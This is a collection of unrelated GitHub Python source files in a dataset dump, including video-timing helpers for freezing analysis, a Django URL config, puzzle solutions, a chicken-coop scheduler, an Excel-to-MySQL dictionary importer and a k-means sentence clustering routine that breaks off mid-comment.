second of video\n units_steps (str): the units of the step size\n units_timestamp (str): the units of the start timestamp\n\n Returns:\n list: list of timestamps\n \"\"\"\n if units_timestamp == \"min\":\n min, sec = break_down_timestamp(start_timestamp)\n start_frame_num = convert_sec_to_frames(convert_min_to_sec(min, sec), fps)\n elif units_timestamp == \"sec\":\n start_frame_num = convert_sec_to_frames(start_timestamp, fps)\n\n if units_steps == \"sec\":\n step_in_frames = convert_sec_to_frames(step, fps)\n elif units_steps == \"min\":\n min, sec = break_down_timestamp(step)\n step_in_frames = convert_sec_to_frames(convert_min_to_sec(min, sec), fps) \n\n #print(\"start_frame_num: \", start_frame_num)\n #print(\"step_in_frames: \", step_in_frames)\n frame_stamps = [start_frame_num + i * step_in_frames for i in range(0, num_events)]\n #print(\"frame_stamps: \", frame_stamps)\n return frame_stamps\n\n# need 3 parameters for the following reasons:\n# 1. need to know the fps of the video - fps depends on type of video\n# 2. need to know the start time of the video - start time depends on when the video was started\n# 3. file_path for timing file\ndef timing_file_processing(file_path, fps, start_time_in_frames):\n df = pd.read_csv(file_path)\n #iterate through columns except trial column\n for col in list(df.columns):\n #print(list(df[col]))\n if col != \"Trial\":\n # determine if it's in min:sec format or sec format\n if \":\" in str(list(df[col])[0]):\n time_format_to_frames(df, col, fps, start_time_in_frames)\n else:\n secs_to_frames(df, col, fps, start_time_in_frames)\n\n print(df.head())\n return df\n\ndef time_format_to_frames(df: pd.DataFrame, col, fps, start_time_in_frames):\n new_lst = []\n old_lst = list(df[col])\n for i in old_lst:\n min = int(i.split(\":\")[0])\n sec = int(i.split(\":\")[1])\n min_to_sec = min * 60\n total_sec = min_to_sec + sec\n frame_num = (total_sec * fps) + start_time_in_frames\n new_lst.append(frame_num)\n df[col] = new_lst\n\ndef secs_to_frames(df: pd.DataFrame, col, fps, start_time_in_frames):\n new_lst = []\n old_lst = list(df[col])\n for i in old_lst:\n frame_num = (i * fps) + start_time_in_frames\n new_lst.append(frame_num)\n df[col] = new_lst\n\n\ndef freezing_output_processing(file_path):\n df_result = pd.read_csv(file_path)\n\n frame_list = list(df_result[\"Frame\"])\n frame_list = [i + count for count, i in enumerate(frame_list)]\n df_result[\"Frame\"] = frame_list\n\n #print(df_result.head())\n return df_result\n\ndef replace_func(x, col, timestamps):\n if x in timestamps:\n print(col)\n return col\n else:\n return x\n\n# do this after their processing\ndef freezing_alignment(df_freezing_out: pd.DataFrame, df_timing: pd.DataFrame):\n # add empty column first (zero-filled)\n df_freezing_out[\"Timestamps\"] = [0] * len(df_freezing_out)\n replace_lst = list(df_freezing_out[\"Timestamps\"])\n #print(\"here\")\n\n for col in list(df_timing.columns):\n if col != \"Trial\":\n timestamps = list(df_timing[col])\n print(\"timestamps\")\n print(timestamps)\n\n #replace_func = lambda x: col if x in timestamps else x\n new_series = df_freezing_out[\"Frame\"].apply(lambda x: replace_func(x, col, timestamps)).tolist()\n #print(new_series)\n # now replace that old timestamps col with new_series\n for idx, val in enumerate(new_series):\n if isinstance(val, str):\n replace_lst[idx] = val\n\n df_freezing_out[\"Timestamps\"] = replace_lst\n return df_freezing_out\n\ndef line_chart(x, y, outpath):\n fig, ax = plt.subplots()\n\n ax.plot(x, y)\n\n n = 1000 # every other nth tick\n for i, tick in enumerate(ax.xaxis.get_major_ticks()):\n if i % n != 0:\n tick.label1.set_visible(False)\n\n plt.show()\n fig.savefig(outpath)\n\ndef overlap_two_lists(list1, list2):\n new_lst = []\n for idx, val in enumerate(list2):\n if isinstance(val, str) and val != '0':\n new_lst.append(val)\n else:\n new_lst.append(int(list1[idx]))\n \n return new_lst\n\ndef lst_to_binary_lst(lst):\n new_lst = []\n for i in range(len(lst)):\n if lst[i] == 100:\n new_lst.append(1)\n else:\n new_lst.append(0)\n \n return new_lst\n\ndef get_proportion_freezing(freezing_sublst):\n num_freezing_points = len([i for i in freezing_sublst if i == 1])\n num_points = len(freezing_sublst)\n proportion = num_freezing_points / num_points\n\n return proportion\n\ndef bin_data(frame_lst, timestamps, freezing_lst, half_time_window, fps, event_tracked):\n binned_timestamps_lst = []\n binned_freezing_lst = []\n\n for idx, val in enumerate(timestamps):\n # everytime a timestamp is discovered this is what happens\n if val == event_tracked:\n # this means it's a timestamp, get when i happened\n time = timedelta(seconds=(frame_lst[idx] / fps))\n\n # these could be floats\n lower_bound_idx = int(idx)\n upper_bound_idx = int(idx + (half_time_window * fps))\n\n time_str = f\"{val}:{time} : {frame_lst[idx]}\"\n #print(time_str)\n binned_timestamps_lst.append(time_str)\n #print(lower_bound_idx, upper_bound_idx)\n\n freezing_sublst = freezing_lst[lower_bound_idx : upper_bound_idx]\n freezing_proportion = get_proportion_freezing(freezing_sublst)\n binned_freezing_lst.append(freezing_proportion)\n\n return binned_timestamps_lst, binned_freezing_lst\n","repo_name":"RodrigoSandon/LBGN3","sub_path":"EzTrack/ProductStageEzTrackPipeline/EzTrackFunctions.py","file_name":"EzTrackFunctions.py","file_ext":"py","file_size_in_byte":6921,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"29075364374","text":"from django.conf.urls import url\nfrom django.contrib import admin\n\nfrom .views import (\n\tCommentListAPIView,\n\tCommentCreateAPIView\n\t)\n\nurlpatterns = [\n\turl(r'^$', CommentListAPIView.as_view(), name='list'),\n\turl(r'^create/(?P\\d+)/$',CommentCreateAPIView.as_view(), name='create'),\n# \turl(r'^(?P\\d+)/$',StatusRetrieveAPIView.as_view(),name='retrieve'),\n# \turl(r'^(?P\\d+)/update/$',StatusUpdateAPIView.as_view(),name='update'),\n# \turl(r'^(?P\\d+)/destroy/$',StatusDestroyAPIView.as_view(),name='destroy'),\n]\n\napp_name = 'comments-api'","repo_name":"rajatshenoy56/Social-Media-API","sub_path":"comments/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"6014491874","text":"\nwith open('input2.1.txt') as file:\n s = file.read().split('\\n')\n print(s)\n\nprint(s)\nhor = 0\nver = 0\naim = 0\nfor direction in s:\n d, val = direction.split()\n val = int(val)\n if d == 'forward':\n hor += val\n ver += aim*val\n if d == 'down':\n aim += val\n if d == 'up':\n aim -= val\n\n\nprint(s)\n\nprint(hor*ver)\n","repo_name":"Ben-Ku/Advent_of_Code","sub_path":"Advent_of_Code_2021/2/2.1.py","file_name":"2.1.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"41819750398","text":"import numpy\n\nimport cv2\n\nfrom Segmenter.UnetLoader import UnetLoader\nfrom Segmenter.model.StateObjectClasses import StateObjectClasses\n\n\nclass ImageStreamCreator:\n folder_with_original_images = None\n u_net_required_dim = 224\n root_path_for_segmented_images = \"./Segmenter/Images/SegmentedImages\"\n root_path_for_state_object_classes = \"./Segmenter/Images/OutputImages\"\n video_name = None\n\n def __init__(self, folder_with_images, video_name):\n self.folder_with_original_images = folder_with_images\n self.video_name = video_name\n\n # This logic is simular to the logic in Frame AutoEncoder. Consider making a util for this\n def get_segmented_image_stream(self):\n if self.check_to_see_if_segmented_image_folder_exists(\n self.root_path_for_segmented_images + \"/\" + self.video_name):\n return numpy.load(self.root_path_for_segmented_images + \"/\" + self.video_name + \"/segmented.npy\")\n else:\n return self.load_original_images_and_segment()\n\n def get_original_images(self):\n matrix = self.load_images_from_a_file(self.folder_with_original_images, True)\n return matrix\n\n def check_to_see_if_segmented_image_folder_exists(self, filename):\n if cv2.os.path.isdir(filename) and len(cv2.os.listdir(filename)) > 0:\n return True\n return False\n\n def load_original_images_and_segment(self):\n matrix = self.load_images_from_a_file(self.folder_with_original_images, True)\n matrix = self.segment_image_stream(matrix)\n self.save_segmented_images(matrix, self.root_path_for_segmented_images, self.video_name)\n return matrix\n\n def load_images_from_a_file(self, folder_path, is_in_color):\n matrix = None\n num_in_matrix = 0\n file_names = cv2.os.listdir(folder_path)\n file_names.sort()\n for filename in file_names:\n if not filename.endswith(\".png\") and not filename.endswith(\".jpg\"):\n continue\n if is_in_color:\n image = cv2.imread(folder_path + \"/\" + filename, 1)\n else:\n image = cv2.imread(folder_path + \"/\" + filename, 0)\n image = cv2.resize(image, (self.u_net_required_dim, self.u_net_required_dim))\n if num_in_matrix == 0:\n if is_in_color:\n matrix = numpy.empty([len(cv2.os.listdir(folder_path)),\n self.u_net_required_dim,\n self.u_net_required_dim, 3])\n else:\n matrix = numpy.empty([len(cv2.os.listdir(folder_path)),\n self.u_net_required_dim,\n self.u_net_required_dim])\n if is_in_color:\n matrix[num_in_matrix, :, :, :] = image\n else:\n matrix[num_in_matrix, :, :] = image\n num_in_matrix += 1\n return matrix\n\n def segment_image_stream(self, original_image_matrix):\n u_net_loader = UnetLoader()\n u_net = u_net_loader.load_unet()\n return u_net.predict(original_image_matrix)\n\n # Not necessary but it makes iterations faster\n def save_segmented_images(self, segmented_matrix, folder_path, video_name):\n cv2.os.mkdir(folder_path + \"/\" + video_name)\n numpy.save(folder_path + \"/\" + video_name + \"/segmented\", segmented_matrix)\n\n def get_state_object_classes_for_training(self):\n list_of_objects = cv2.os.listdir(self.root_path_for_state_object_classes)\n list_of_objects.sort()\n class_num_and_num_pics = []\n current_class_number = 0\n images = []\n for state_objects in list_of_objects:\n one_object_matrix = self.load_images_from_a_file(\n self.root_path_for_state_object_classes + \"/\" + state_objects, True)\n images.append(one_object_matrix)\n class_num_and_num_pics.append((current_class_number, one_object_matrix.shape[0]))\n current_class_number += 1\n images = numpy.array(images)\n images = images.reshape((-1, images.shape[2], images.shape[3], images.shape[4]))\n return StateObjectClasses(images, self.build_classification_matrix(class_num_and_num_pics, images, current_class_number))\n\n\n def build_classification_matrix(self, class_num_and_num_pics, image_matrix, number_of_classes):\n classification_matrix = numpy.zeros((image_matrix.shape[0], number_of_classes))\n i = 0\n for object_index in class_num_and_num_pics:\n for row in range(object_index[1]):\n classification_matrix[i, object_index[0]] = 1\n i += 1\n return classification_matrix\n","repo_name":"hujohnso/AutoencoderTrainingEngine","sub_path":"Segmenter/ImageStreamCreator.py","file_name":"ImageStreamCreator.py","file_ext":"py","file_size_in_byte":4753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"24481274620","text":"import yaml\nimport schedule\nimport time\nfrom components.mg996r_servo import Servo\nfrom components.nema17_stepmotor import Stepmotor\nfrom pathlib import Path\n\ncfgpath = Path(__file__).parent / \"config.yml\"\nwith open(str(cfgpath), \"r\") as cfgfile:\n cfg = yaml.full_load(cfgfile)\n\n\nclass Chickpi(Resource):\n def feed(self):\n servo = Servo()\n servo.set_position(108)\n time.sleep(cfg[\"feeding_factor\"])\n servo.set_position(0)\n servo.shutdown()\n\n def open_door(self):\n stepper = Stepmotor()\n stepper.rotate(doorheight_in_degrees())\n stepper.shutdown()\n\n def close_door(self):\n stepper = Stepmotor()\n stepper.rotate(-doorheight_in_degrees())\n stepper.shutdown()\n\n def doorheight_to_degrees(self):\n rotations = cfg[\"door_open_height_in_mm\"] / 25.13 # Measured spool circumfence\n return rotations * 360\n\n\n# Run it\n\nchickpi = Chickpi()\n\nschedule.every().day.at(cfg[\"opening_time\"]).do(chickpi.open_door)\nschedule.every().day.at(cfg[\"closing_time\"]).do(chickpi.close_door)\nfor feeding_time in cfg[\"feeding_times\"]:\n schedule.every().day.at(feeding_time).do(chickpi.feed)\n\nwhile True:\n schedule.run_pending()\n time.sleep(60)\n","repo_name":"Joerg-Seitz/Chickpi","sub_path":"chickpi.py","file_name":"chickpi.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"28174351489","text":"#!/usr/bin/env python3\nfrom subprocess import Popen\nimport os\nfrom sys import exit\nfrom urllib.parse import unquote, urlparse\nimport dbus\nbus = dbus.SessionBus()\n\nclass GrabSong(object):\n def __init__(self, player):\n self.start = True\n self.player = player\n self.player_proper_name = None\n self.song_changed = True\n self.metadata = self.get_metadata()\n self.curdir = os.path.dirname(os.path.realpath(__file__))\n self.outdir = \"%s/Output\" % self.curdir\n self.outfiles = [\"Artist\", \"Album\", \"Title\"]\n self.song_art = None\n\n def get_metadata(self):\n try:\n data = bus.get_object(\"org.mpris.MediaPlayer2.%s\" % self.player,\n '/org/mpris/MediaPlayer2')\n except dbus.exceptions.DBusException as e:\n if e._dbus_error_name.endswith(\"ServiceUnknown\"):\n print(\"Unknown service. Please make sure there is no typo and that the media player is started.\")\n exit(1)\n\n interface = dbus.Interface(data, dbus_interface=\"org.freedesktop.DBus.Properties\")\n metadata = interface.Get(\"org.mpris.MediaPlayer2.Player\", \"Metadata\")\n\n try:\n art_uri = str(metadata[\"mpris:artUrl\"])\n if art_uri.startswith(\"file://\"):\n path = urlparse(art_uri)\n self.song_art = unquote(os.path.abspath(os.path.join(path.netloc, path.path)))\n else:\n self.song_art = None\n except:\n self.song_art = None\n\n self.player_proper_name = interface.Get(\"org.mpris.MediaPlayer2\", \"Identity\")\n\n returned_value = {}\n\n try:\n returned_value[\"Artist\"] = metadata[\"xesam:artist\"][0]\n except:\n returned_value[\"Artist\"] = \"\"\n\n try:\n returned_value[\"Album\"] = metadata[\"xesam:album\"]\n except:\n returned_value[\"Album\"] = \"\"\n\n try:\n returned_value[\"Title\"] = metadata[\"xesam:title\"]\n except:\n returned_value[\"Title\"] = \"\"\n\n if self.song_changed == False:\n self.song_changed = self.metadata[\"Artist\"] != returned_value[\"Artist\"] and self.metadata[\"Album\"] != returned_value[\"Album\"] and self.metadata[\"Title\"] != returned_value[\"Title\"]\n\n return returned_value\n\n def save(self):\n try:\n os.makedirs(self.outdir)\n except OSError:\n if os.path.isdir(self.outdir):\n pass\n else:\n raise\n\n for name in self.outfiles:\n with open(\"%s/Song%s.txt\" % (self.outdir, name), \"w\") as f:\n f.write(self.metadata[name])\n if not self.song_art:\n self.song_art = \"%s/Images/NoArt.jpg\" % self.curdir\n\n Popen(\n [\n \"convert\",\n self.song_art, \"-resize\", \"500x500!\",\n self.outdir + \"/AlbumArt.jpg\"\n ]\n )\n\n def update(self):\n try:\n self.metadata = self.get_metadata()\n\n for typ in self.outfiles:\n try:\n if self.metadata[typ]:\n pass\n except KeyError:\n self.metadata[typ] = \"No information available.\"\n\n if self.song_changed or self.start is True:\n self.start = False\n self.song_changed = False\n self.save()\n except KeyError:\n self.metadata = \"No valid metadata detected.\"\n","repo_name":"aFoxNamedMorris/pygrab-song","sub_path":"GrabSong.py","file_name":"GrabSong.py","file_ext":"py","file_size_in_byte":3505,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"63"} +{"seq_id":"6648393062","text":"from django.utils import timezone\nfrom django.db.models import F\nfrom milk.models import Tracker\n\ndef update_days():\n tracker = Tracker.objects.get(id=1)\n \n today = timezone.now().day\n\n if timezone.now().hour == 2 and tracker.total_days < today:\n tracker.total_days = F(\"total_days\") + 1\n tracker.save()\n print(\"UPDATED\")","repo_name":"karimdevelops/django-expense-tracker","sub_path":"jobs/jobs.py","file_name":"jobs.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"30291429984","text":"#scorekeeping is currently disconnected from everything because idk how to connect it\ndef scoreTest():\n p1score = 0\n p2score = 0\n printScore(p1score, p2score)\n\n while True: \n player = input(\"Which player scored? (1 or 2)\")\n amount = int(input(\"How many points did they score\"))\n\n if player == \"1\":\n p1score= changeScore(p1score, amount)\n\n elif player == \"2\":\n p2score= changeScore(p2score, amount)\n \n else:\n print(\"enter a real player pls\")\n\n printScore(p1score, p2score)\n\n #Returns player number if they win by getting over 15 points\n if p1score >= 15:\n print(\"player one wins!\")\n break\n\n if p2score >= 15:\n print(\"player two wins!\")\n break\n\n# Changes only player one or player two's score based on changeAmount, then returns the new score\ndef changeScore(changeAmount, currentScore):\n #returns player one's new changed score\n return (currentScore + changeAmount) \n\n#prints both players scores\ndef printScore(playerOneScore, playerTwoScore):\n\n print (\"Player One's score is :\", playerOneScore)\n print (\"Player Two's score is :\", playerTwoScore)\n\nscoreTest()","repo_name":"AkashaSnow/LightsaberScoring_GalacticSaber","sub_path":"GalacticSaber/matchscoring/scoreKeeping.py","file_name":"scoreKeeping.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"13521569573","text":"def quick(x, first, last):\n if first < last:\n pivot = first\n i = first\n j = last\n while i < j:\n while x[i] <= x [pivot] and i < last:\n i += 1\n while x[j] > x[pivot]:\n j -= 1\n if i < j:\n x[i],x[j] = x[j],x[i]\n x[pivot],x[j] = x[j],x[pivot]\n quick(x,first,j-1)\n quick(x,j+1,last)\n \n \nt = int(input())\na = []\nfor i in range(0,t):\n a.append(int(input()))\nquick(a,0,t-1)\nprint (a)\n \n \n \n \n \n \n","repo_name":"ayusinghi96/CodeChefPrograms","sub_path":"TSORT(quick sort).py","file_name":"TSORT(quick sort).py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"35870310315","text":"#implementation for understanding\nclass HshTbl:\n def __init__(self, size):\n self.data = [[]]*size\n\n def __hash(self, key) -> int:\n hsh = 0\n for i in range(len(key)):\n hsh = (hsh + ord(key[i]) * i) % len(self.data)\n return hsh\n\n def set(self, key, value) -> None:\n address = self.__hash(key)\n self.data[address] = self.data[address] + [[key, value]]\n return self.data\n\n\n def get(self, key):\n address = self.__hash(key)\n for i in range(len(self.data[address])):\n if self.data[address][i][0] == key:\n return self.data[address][i][1]\n return None\n\n def keys(self):\n ex_array = []\n for backet_pool in self.data:\n if backet_pool:\n for cur_backet in backet_pool:\n ex_array.append(cur_backet[0])\n return ex_array\n\n\n\nhtbl = HshTbl(10)\n\nhtbl.set(\"some\", 552)\nhtbl.set(\"value\", 15)\nhtbl.set(\"test\", \"aboba\")\nhtbl.set(\"planes\", 2000)\n\nprint(htbl.keys())","repo_name":"ShchekodinNA/Data-structures-and-algoritms","sub_path":"Data structures/Hash_Tables/Implementing_hash table.py","file_name":"Implementing_hash table.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"37125480287","text":"__author__ = 'swallow'\n__language__= 'python 3.0'\n#! /usr/bin/python\n#coding:utf-8\nimport logging\nimport os\nimport sys\nimport time\n\nimport xlrd\n\nfrom .DictionaryDB import MysqlDb\nfrom .string_tools import replace_single_quotation\nfrom .updateLanguageData import updateAllwordsData\n\nKEYWORD_COL_NO = 0\nTABLE_NAME_ALLWORDS = 'allwords_list'\nTABLE_NAME_PROC = 'proc_list'\nTABLE_NAME_LANGUAGE = 'language_table'\n\nSHEET_NAME = \"word_list\"\n\nSTATUS_PROCESS_WAIT = 0\nSTATUS_PROCESSING = 1\nSTATUS_PROCESS_FINSHED = 2\n\nSTATUS_PROCESS_ERROR = -1\n\nclass ImportProcessInfo:\n m_rowCount = 0\n m_processedRowNumber = 0\n m_process_status = STATUS_PROCESS_WAIT\n m_process_language = ''\n m_process_comment = None\n\n\n\ng_myProcInfoList = {}\n\ndef import_excel_dictionary(excel_file, client_info, update_interpre_flag, update_ip, update_user):\n proc_id = client_info.get_proc_id()\n if proc_id is None:\n return\n\n myProcInfo = ImportProcessInfo()\n myProcInfo.m_rowCount = 0\n myProcInfo.m_processedRowNumber = 0\n myProcInfo.m_process_status = STATUS_PROCESS_WAIT\n myProcInfo.m_process_comment = 'Waiting for processing'\n\n mydb = MysqlDb()\n mydb.initDB()\n\n\n g_myProcInfoList[proc_id] = myProcInfo\n\n filename = os.path.join(os.getcwd(), excel_file)\n try:\n book = xlrd.open_workbook(excel_file)\n sheet = book.sheet_by_name(SHEET_NAME)\n\n language_string = sheet.cell(0, KEYWORD_COL_NO).value\n myProcInfo.m_rowCount = sheet.nrows\n myProcInfo.m_process_status = STATUS_PROCESSING\n myProcInfo.m_process_comment = 'Start processing'\n\n language_id = sheet.cell(0,0).value\n myProcInfo.m_process_language = language_id\n\n i = 1\n insert_item_count = 0\n while (i < myProcInfo.m_rowCount):\n keyword = sheet.cell(i, 0).value\n word_interpre = \"\"\n if (sheet.ncols > 1):\n word_interpre = sheet.cell(i, 1).value\n\n if keyword is None:\n break\n else:\n keyword_in_sql = replace_single_quotation(str(keyword))\n select_sql = \"SELECT * FROM \" + TABLE_NAME_ALLWORDS + \" WHERE entry = '\" + keyword_in_sql + \"' ;\"\n # print (select_sql)\n dataResult = mydb.select_data(select_sql)\n # print(number)\n if (dataResult['num'] == 0):\n # \"INSERT INTO podcast_keyword_dictionary VALUES (null,'aaaaa','en-gb','2018/1/9');\"\n localtime = time.strftime(\"%Y%m%d%H%M%S\", time.localtime())\n # print(\"current timestamp is :\", localtime)\n\n sql = \"INSERT INTO \" + TABLE_NAME_ALLWORDS + \" VALUES (null,'\" + keyword_in_sql + \"','\" \\\n + word_interpre +\"','\" + language_string + \"','\" + localtime \\\n + \"', null, null, '\" + update_ip + \"', '\" + update_user + \"');\"\n print(sql)\n param = ('test@test.org', 'very-secret')\n mydb.insert_data(sql, None)\n insert_item_count += 1\n else:\n if (update_interpre_flag == 'on'):\n if word_interpre is not None:\n stringID = dataResult['result'][0][0]\n word_interpre_in_sql = replace_single_quotation(str(word_interpre))\n updateAllwordsData(stringID, keyword, word_interpre, update_ip, update_user)\n\n else:\n print(keyword_in_sql + \" already existed.\")\n\n myProcInfo.m_processedRowNumber = i\n i += 1\n\n myProcInfo.m_process_status = STATUS_PROCESS_FINSHED\n myProcInfo.m_process_comment = 'Normal finshed'\n\n mydb.close_connect()\n\n base_excel_file = os.path.basename(excel_file)\n saveClientInfoToDB(language_id, base_excel_file, insert_item_count, client_info)\n insertLanguageDB(language_id, base_excel_file, update_ip, update_user)\n del g_myProcInfoList[proc_id]\n\n return True\n except Exception as e:\n logging.exception(e)\n myProcInfo.m_process_status = STATUS_PROCESS_ERROR\n myProcInfo.m_process_comment = e.args[0]\n mydb.close_connect()\n\n return False\n\ndef saveClientInfoToDB(language_id, excel_file, insert_item_count, client_info):\n proc_id = client_info.get_proc_id()\n if proc_id is None:\n return\n\n mydb = MysqlDb()\n mydb.initDB()\n\n ip_address = client_info.get_ipaddress()\n city_name = client_info.get_city()\n region_name = client_info.get_region()\n country_name = client_info.get_country()\n latitude = client_info.get_latitude()\n longitude = client_info.get_longitude()\n time_zone = client_info.get_timezone()\n\n\n select_sql = \"SELECT * FROM \" + TABLE_NAME_PROC + \" WHERE proc_id = '\" + proc_id + \"' ;\"\n # print (select_sql)\n number = mydb.select_data(select_sql)\n # print(number)\n if (number['num'] == 0):\n localtime = time.strftime(\"%Y%m%d%H%M%S\", time.localtime())\n\n sql = \"INSERT INTO \" + TABLE_NAME_PROC + \" VALUES ('\" + language_id + \"','\" + excel_file + \"', \" + str(insert_item_count) + \",'\" +\\\n proc_id + \"','\" + ip_address + \"','\" + city_name + \"','\" + region_name + \"','\" + country_name + \\\n \"','\" + latitude + \"','\" + longitude + \"','\" + time_zone + \"','\" + localtime + \"');\"\n print(sql)\n param = ('test@test.org', 'very-secret')\n mydb.insert_data(sql, None)\n else:\n print(\" proc \" + proc_id + \" already existed. Wrong import task\")\n\n mydb.close_connect()\n\ndef findInDB(proc_id):\n mydb = MysqlDb()\n mydb.initDB()\n select_sql = \"SELECT * FROM \" + TABLE_NAME_PROC + \" WHERE proc_id = '\" + proc_id + \"' ;\"\n number = mydb.select_data(select_sql)\n mydb.close_connect()\n # print(number)\n return number\n\n\ndef getCurrentProcessRate(proc_id):\n procInfo = g_myProcInfoList.get(proc_id, None)\n if procInfo is None:\n data = findInDB(proc_id)\n result = data['result']\n num = data['num']\n if num > 0:\n return 100\n else:\n return 0\n elif procInfo.m_rowCount is 0:\n return 0\n else:\n return (int((procInfo.m_processedRowNumber * 100)/procInfo.m_rowCount))\n\ndef getCurrentProcessStatus(proc_id):\n procInfo = g_myProcInfoList.get(proc_id, None)\n if procInfo is None:\n data = findInDB(proc_id)\n result = data['result']\n num = data['num']\n if num > 0:\n return STATUS_PROCESS_FINSHED\n else:\n return STATUS_PROCESS_WAIT\n\n return procInfo.m_process_status\n\ndef getCurrentProcessComment(proc_id):\n procInfo = g_myProcInfoList.get(proc_id, None)\n if procInfo is None:\n data = findInDB(proc_id)\n result = data['result']\n num = data['num']\n if num > 0:\n return 'Normal finshed'\n else:\n return 'Not started'\n\n return procInfo.m_process_comment\n\ndef getCurrentProcessLanguage(proc_id):\n procInfo = g_myProcInfoList.get(proc_id, None)\n if procInfo is None:\n data = findInDB(proc_id)\n result = data['result']\n num = data['num']\n\n if num > 0:\n return result[0][0]\n else:\n return \"null\"\n\n return procInfo.m_process_language\n\ndef insertLanguageDB(language_id, language_file, update_ip, update_user):\n\n mydb = MysqlDb()\n mydb.initDB()\n\n select_sql = \"SELECT * FROM \" + TABLE_NAME_LANGUAGE + \" WHERE language_id = '\" + language_id + \\\n \"' and language_file = '\" + language_file + \"';\"\n\n result = mydb.select_data(select_sql)\n if (result['num'] == 0):\n sql = \"INSERT INTO \" + TABLE_NAME_LANGUAGE + \" VALUES ('\" \\\n + language_id + \"','\" + language_file + \"','\"+ update_ip +\"', '\" + update_user + \"');\"\n param = ('test@test.org', 'very-secret')\n mydb.insert_data(sql, None)\n\n mydb.close_connect()\n\n\nif __name__ == '__main__':\n if len(sys.argv) != 1:\n print( 'Start generating...')\n import_excel_dictionary(sys.argv[1], '0000')\n exit()\n else:\n print('Please input command such as:')\n print('python importKeywordDictionary.py xxxx.xlsx')","repo_name":"georgesandlily/DictApp","sub_path":"dictionary/tools/ImportKeywordDictionary.py","file_name":"ImportKeywordDictionary.py","file_ext":"py","file_size_in_byte":8307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"45682878704","text":"from numpy import array, dot, mean, argsort\nimport gensim\nimport random\n\n\ndef kmeans(tokenListInput, word2vecModel, numIters, numOfCentroids):\n # basic ideas: for each word in a sentence, we are going to translate it into a vector.\n # We define the centroid of a cluster to be the average of all vectors within the cluster.\n # notice that each element of a vector is a feature vector.\n def tokenListToVecArray(tokenl):\n v1 = []\n # print tokenList\n for word in tokenl:\n # each model[word] is a feature vector of size 100 (current default setting)\n # seems that gensim can sometimes miss some words... not sure how to fix\n if word not in word2vecModel.wv.vocab:\n v1.append([-0.9]*100) # smoothing\n else:\n v1.append(word2vecModel[word])\n return gensim.matutils.unitvec(array(v1).mean(axis=0))\n\n def converge(mus1, mus2):\n for i in range(len(mus1)):\n mu1 = mus1[i]\n mu2 = mus2[i]\n print('dot product is', dot(mu1, mu2))\n if abs(1.0 - dot(mu1, mu2)) > 0.001:\n return False\n return True\n\n # This step of kmeans provides a rough idea of how the sentences are distributed.\n # store similarity score in a matrix to avoid extra calculations\n centroidIndexes = random.sample(list(range(0, len(tokenListInput))), numOfCentroids)\n # centroidIndexes = [91, 43, 81, 125, 79, 149, 34, 172, 100, 137, 77, 46, 29, 54, 5, 38, 10, 2, 166, 118, 20, 33, 23, 67, 105, 12, 123, 159, 126, 120, 84, 102, 152, 87, 136, 115, 52, 0, 101, 37, 130, 147, 26, 157, 68, 9, 24, 114, 66, 31, 160, 28, 72, 142, 133]\n\n # print 'numOfCentroids = ', numOfCentroids\n # print centroidIndexes\n # print '>>>>>>>>>>'\n\n mus = list()\n for cent in centroidIndexes:\n print(tokenListInput[cent])\n # to increase computation efficiency and potentially memory, we store vectors instead of actual word lists\n mus.append(tokenListToVecArray(tokenListInput[cent]))\n\n iterations = numIters\n assignments = [None for _ in range(len(tokenListInput))]\n assignmentsIndexList = [None for _ in range(len(tokenListInput))]\n lastAssignmentIndexList = [None for _ in range(len(tokenListInput))]\n vectorList = [None for _ in range(len(tokenListInput))]\n\n for xiIndex in range(0, len(tokenListInput)):\n xi = tokenListInput[xiIndex]\n vectorList[xiIndex] = tokenListToVecArray(xi)\n\n for numIter in range(0, iterations):\n print(\"kmeans: in iteration \", numIter)\n for xiIndex in range(0, len(tokenListInput)):\n xi = tokenListInput[xiIndex]\n xiVec = vectorList[xiIndex]\n\n maxSimilarity = -2\n # assign every sentence to a closet one by their cosine difference\n for muIndex in range(0, len(mus)):\n mu = mus[muIndex]\n\n # print xiVec, mu\n cosSimilarity = dot(xiVec, mu)\n\n # print cosSimilarity, maxSimilarity\n\n if cosSimilarity > maxSimilarity:\n assignmentsIndexList[xiIndex] = muIndex\n assignments[xiIndex] = mu\n maxSimilarity = cosSimilarity\n\n # calculate new centroids by averaging points in the cluster\n clusterCountList = [0 for _ in range(0, len(mus))]\n clusterSumList = [0 for _ in range(0, len(mus))]\n for xiIndex in range(0, len(tokenListInput)):\n xiVec = vectorList[xiIndex]\n clusterSumList[assignmentsIndexList[xiIndex]] += xiVec\n clusterCountList[assignmentsIndexList[xiIndex]] += 1\n\n # get and store new centroids\n newMus = [None for m in range(len(mus))]\n for muIndex in range(len(mus)):\n if clusterCountList[muIndex] == 0:\n newMus[muIndex] = 0\n else:\n newMus[muIndex] = clusterSumList[muIndex] / clusterCountList[muIndex]\n\n if lastAssignmentIndexList == assignmentsIndexList:\n break\n\n mus = list(newMus)\n lastAssignmentIndexList = list(assignmentsIndexList)\n return mus, assignmentsIndexList, assignments, vectorList\n\n\n# a: the mean distance between a sample and all other points in the same class\n# b: the mean distance between a sample and all other points in the next nearest cluster.\n# Silhouette Coefficient s for this sample is given by:\n# s = (b-a) / 